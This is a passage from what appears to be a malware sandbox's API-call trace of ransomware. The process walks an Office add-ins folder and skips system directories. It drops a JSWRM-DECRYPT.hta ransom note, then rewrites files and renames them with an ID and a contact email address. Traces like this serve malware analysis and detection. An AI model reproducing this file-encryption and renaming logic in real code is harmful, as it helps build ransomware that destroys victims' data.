ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x519a5bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ae0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0125.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0125.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0125.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0125.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0125.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.841] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa31be8d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa31be8d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa4733b6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0125.841] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0125.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0125.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.841] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa31be8d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa31be8d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa4733b6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0125.841] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0125.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.842] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2=".") returned 1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="..") returned 1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="...") returned 1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="windows") returned -1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="recovery") returned -1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="perflogs") returned -1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="documents and settings") returned -1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="$RECYCLE.BIN") returned 1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="system volume information") returned -1 [0125.842] lstrcmpiW (lpString1="Cartridges", lpString2="msocache") returned -1 [0125.950] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\jswrm-decrypt.hta")) returned 0xffffffff [0125.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.955] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.955] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.956] CloseHandle (hObject=0x314) returned 1 [0125.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\jswrm-decrypt.hta")) returned 0x20 [0125.957] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41bd18eb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0125.957] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.957] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41bd18eb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0125.957] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.957] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.957] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16546d20, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16546d20, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43e4, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2=".") returned 1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="..") returned 1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="...") returned 1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="windows") returned -1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="recovery") returned -1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="perflogs") returned -1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="documents and settings") returned -1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="$RECYCLE.BIN") returned 1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="system volume information") returned -1 [0125.957] lstrcmpiW (lpString1="as80.xsl", lpString2="msocache") returned -1 [0125.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0125.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as80.xsl", lpUsedDefaultChar=0x0) returned 8 [0125.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0125.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as80.xsl", lpUsedDefaultChar=0x0) returned 8 [0125.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.958] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=17380) returned 1 [0125.959] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.959] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x43e0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x43e0, lpOverlapped=0x0) returned 1 [0125.961] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.961] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x43e0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x43e0, lpOverlapped=0x0) returned 1 [0125.961] CloseHandle (hObject=0x338) returned 1 [0125.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0125.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0125.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24f870 [0125.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as80.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as80.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as80.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f870 | out: hHeap=0x1e0000) returned 1 [0125.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0125.963] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x165b9401, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x49ba, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="as90.xsl", cAlternateFileName="")) returned 1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2=".") returned 1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="..") returned 1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="...") returned 1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="windows") returned -1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="recovery") returned -1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="perflogs") returned -1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="documents and settings") returned -1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="$RECYCLE.BIN") returned 1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="system volume information") returned -1 [0125.963] lstrcmpiW (lpString1="as90.xsl", lpString2="msocache") returned -1 [0125.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0125.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0125.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as90.xsl", lpUsedDefaultChar=0x0) returned 8 [0125.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0125.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0125.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as90.xsl", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as90.xsl", lpUsedDefaultChar=0x0) returned 8 [0125.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0125.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0125.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.964] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=18874) returned 1 [0125.964] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x49b0) returned 0x278330 [0125.964] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x49b0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x49b0, lpOverlapped=0x0) returned 1 [0125.967] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.967] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x49b0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x49b0, lpOverlapped=0x0) returned 1 [0125.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.968] CloseHandle (hObject=0x338) returned 1 [0125.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0125.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0125.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0125.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0125.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 